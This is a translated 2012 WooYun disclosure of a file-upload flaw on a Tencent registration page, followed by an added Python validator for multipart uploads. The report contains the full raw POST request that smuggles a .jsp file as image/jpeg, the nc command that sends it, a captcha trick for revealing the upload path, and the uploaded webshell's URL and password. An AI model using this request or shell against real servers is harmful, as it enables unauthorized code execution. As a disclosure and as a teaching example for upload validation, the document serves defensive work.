Vulnerability summary

Defect ID: wooyun-2012-07463

Title: Arbitrary file upload vulnerability on a Tencent subsite

Vendor: Tencent

Author: Jannock

Submitted: 2012-05-23 20:06

Fixed: 2012-07-07 20:07

Published: 2012-07-07 20:07

Type: File upload leading to arbitrary code execution

Severity: High

Self-assessed rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure timeline:

2012-05-23: Details sent to the vendor, awaiting vendor handling
2012-05-23: Vendor confirmed; details disclosed to the vendor only
2012-06-02: Details disclosed to core white hats and experts in the relevant field
2012-06-12: Details disclosed to regular white hats
2012-06-22: Details disclosed to intern white hats
2012-07-07: Details disclosed to the public

Brief description:

Arbitrary file upload vulnerability on a Tencent subsite; it can be used to obtain a shell.

Details:

http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
This is the registration page.
At the "ID card scan" upload field, any file can be uploaded directly. Remember to fill in the captcha incorrectly, so that the response returns the address of the uploaded file.
Below is the request submitted with nc:
POST /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg HTTP/1.1
Host: tap.3g.qq.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://tap.3g.qq.com:8080/mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg
Cookie: JSESSIONID=ft7AHd82i0g7rMg5Dt
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 2679

-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_BUS"

CPRegister
-----------------------------24464570528145
Content-Disposition: form-data; name="MVC_ACTION"

NocpReg
-----------------------------24464570528145
Content-Disposition: form-data; name="agreeProtocol"

yes
-----------------------------24464570528145
Content-Disposition: form-data; name="codevalid"

-----------------------------24464570528145
Content-Disposition: form-data; name="isEdit"

false
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_username"

aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd"

111111
-----------------------------24464570528145
Content-Disposition: form-data; name="newpwd_again"

111111
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_name"

aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_person"

aaaaaaabcd
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_mobilephone"

13800138001
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contacttel1"

333-3-55555555
-----------------------------24464570528145
Content-Disposition: form-data; name="province"

2
-----------------------------24464570528145
Content-Disposition: form-data; name="city"

2
-----------------------------24464570528145
Content-Disposition: form-data; name="area"

21
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_qq"

16104383133
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_contact_email"

[email protected]
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_identitycode"

610722197909188715
-----------------------------24464570528145
Content-Disposition: form-data; name="cp_cert_image"; filename="watermarkpreview.jsp"
Content-Type: image/jpeg

xxxxxx
-----------------------------24464570528145
Content-Disposition: form-data; name="cert_image"

http://tap.3g.qq.com:8080/certs/6513B59E371497A2FCAF47E6EC495666.jpg
-----------------------------24464570528145
Content-Disposition: form-data; name="code"

qmqj
-----------------------------24464570528145
Content-Disposition: form-data; name="codesid"

4TTWIX8F53WF3MOISJ7WDHXONNYYYGUU
-----------------------------24464570528145
Content-Disposition: form-data; name="randomSeed"

1115945018
-----------------------------24464570528145--
Note the cp_cert_image field.
nc tap.3g.qq.com 8080<1.txt
Check the response and you will find the path of the uploaded file:
http://tap.3g.qq.com:8080/certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp
It is a webshell picked at random from the web; the password is: jspspy
Please delete it!

Proof of vulnerability:



Fix recommendation:

You should know how!
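The report leaves the fix implicit. The request above shows the two things a server-side check must not trust: the client-supplied filename (watermarkpreview.jsp) and the client-declared Content-Type (image/jpeg). The following Python is an added example, not part of the original report and not Tencent's code: a minimal multipart/form-data parser plus a validator for the cp_cert_image part that checks the extension against an allowlist, requires the declared Content-Type to match that extension, verifies the file's leading bytes, enforces a size limit, and stores the file under a random name that carries the validated extension rather than the client's. The allowlist, the size limit, the boundary string and the sample request bodies are assumptions constructed for the demonstration; only the field name cp_cert_image comes from the report.

```python
import os
import re
import secrets

# Allowlist for the ID-scan field (assumed): permitted extension ->
# (Content-Type the client must declare, leading bytes a genuine file starts with).
ALLOWED_IMAGE_TYPES = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed size limit for a scanned ID card
UPLOAD_FIELD = "cp_cert_image"      # field name taken from the request in the report

_DISPOSITION_RE = re.compile(r'form-data;\s*name="([^"]*)"(?:;\s*filename="([^"]*)")?')


def parse_multipart(content_type, body):
    """Minimal multipart/form-data parser; returns a list of part dicts."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("multipart body without a boundary parameter")
    delimiter = b"\r\n--" + m.group(2).encode("ascii")
    parts = []
    # Prefix a CRLF so the opening delimiter splits the same way as the others.
    for segment in (b"\r\n" + body).split(delimiter)[1:]:
        if segment.startswith(b"--"):          # closing "--boundary--"
            break
        head, sep, data = segment[2:].partition(b"\r\n\r\n")  # skip CRLF after delimiter
        if not sep:
            raise ValueError("part without header/body separator")
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        disp = _DISPOSITION_RE.match(headers.get("content-disposition", ""))
        if not disp:
            raise ValueError("part without a form-data Content-Disposition")
        parts.append({
            "name": disp.group(1),
            "filename": disp.group(2),             # None for plain fields
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def validate_image_part(part):
    """Decide whether an uploaded part is an acceptable image.

    Returns (accepted, reason, stored_name). The stored name is random and
    carries the validated extension, never the client's filename.
    """
    filename = part.get("filename")
    if not filename:
        return False, "no filename", None
    # Only the basename matters; "../" or backslashes from the client are dropped.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension .{ext} not allowed", None
    expected_type, magic = ALLOWED_IMAGE_TYPES[ext]
    if part.get("content_type") != expected_type:
        return False, "declared Content-Type does not match extension", None
    data = part["data"]
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large", None
    if not data.startswith(magic):
        return False, f"content is not {expected_type}", None
    return True, "ok", secrets.token_hex(16) + "." + ext


def check_cert_upload(content_type, body):
    """Locate the ID-scan part in a registration request and validate it."""
    for part in parse_multipart(content_type, body):
        if part["name"] == UPLOAD_FIELD:
            return validate_image_part(part)
    return False, f"{UPLOAD_FIELD} part missing", None


# Constructed demonstration request (not the report's capture).
BOUNDARY = "----ExampleBoundary"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_body(filename, content_type, data):
    """Build a constructed two-part registration body for the demonstration."""
    return (
        f"--{BOUNDARY}\r\n"
        'Content-Disposition: form-data; name="cp_username"\r\n\r\n'
        "demo-user\r\n"
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{UPLOAD_FIELD}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode("latin-1") + data + f"\r\n--{BOUNDARY}--\r\n".encode("ascii")


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, ctype, data in [
        ("upload.jsp", "image/jpeg", b"xxxxxx"),                  # server page declared as JPEG
        ("scan.jpg", "image/jpeg", b"<html>not an image</html>"),  # right name, wrong bytes
        ("../../scan.jpg", "image/jpeg", jpeg),                   # traversal in the name
    ]:
        print(name, check_cert_upload(CONTENT_TYPE, build_body(name, ctype, data)))
```

The order of the checks matters: the extension allowlist runs first so that a name like upload.jsp is rejected before any content is inspected, and the magic-byte check catches the opposite case of a correct name wrapped around non-image content. Storing under a random name with the validated extension also removes the second weakness visible in the report, where the server generated a random name but kept the client's .jsp suffix.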

Copyright notice: when reposting, please credit the source: Jannock@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2012-05-23 20:47

Vendor reply:

Thank you very much for your report; we are already handling this issue urgently.

Latest status:

None yet